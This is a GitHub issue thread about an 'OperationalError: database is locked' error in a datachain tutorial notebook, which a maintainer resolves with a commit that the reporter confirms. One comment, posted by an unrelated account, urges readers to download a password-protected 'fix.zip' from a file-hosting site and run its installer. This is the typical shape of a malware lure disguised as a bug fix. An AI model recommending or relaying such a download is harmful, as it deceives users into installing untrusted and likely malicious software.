### ISSUE TITLE
json-metadata-tutorial.ipynb error

### ISSUE THREAD

**Issue by ayasyrev** [iterative/datachain-examples#15]
Last cell in notebook rise error:

```
Cleanup: 2 tables [00:00, 1002.94 tables/s]

---------------------------------------------------------------------------


OperationalError                          Traceback (most recent call last)

[<ipython-input-28-8bd3e1d495e8>](https://localhost:8080/#) in <cell line: 1>()
----> 1 mysterious_dogs = list(no_dogs_detected.collect("file"))
      2 mysterious_dogs[11].read()

10 frames

[/usr/local/lib/python3.10/dist-packages/datachain/data_storage/sqlite.py](https://localhost:8080/#) in execute(self, query, cursor, conn)
    193             result = conn.execute(*self.compile_to_args(query))
    194         else:
--> 195             result = self.db.execute(*self.compile_to_args(query))
    196         if isinstance(query, CreateTable) and query.element.indexes:
    197             for index in query.element.indexes:

OperationalError: database is locked
```
Check it on colab and locally (ubuntu 22.04, 24.04, python 3.11, 3.12)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shcheklein** [comment]
I've update the notebook a bit. But I'm also hitting the same error at the end. I'm trying to localize and make a small reproducible script.

**Comment by shcheklein** [comment]
Should be fixed in https://github.com/iterative/datachain-examples/commit/37fd9f34ee5aaffbf55984c2162a478fb012027e

@ayasyrev please, give it a try

**Comment by shcheklein** [comment]
Created also this https://github.com/iterative/datachain/issues/377 to do some followups on the iterators management returned by `collect()`

**Comment by ayasyrev** [comment]
> Should be fixed in [37fd9f3](https://github.com/iterative/datachain-examples/commit/37fd9f34ee5aaffbf55984c2162a478fb012027e)
> 
> @ayasyrev please, give it a try

No errors now!
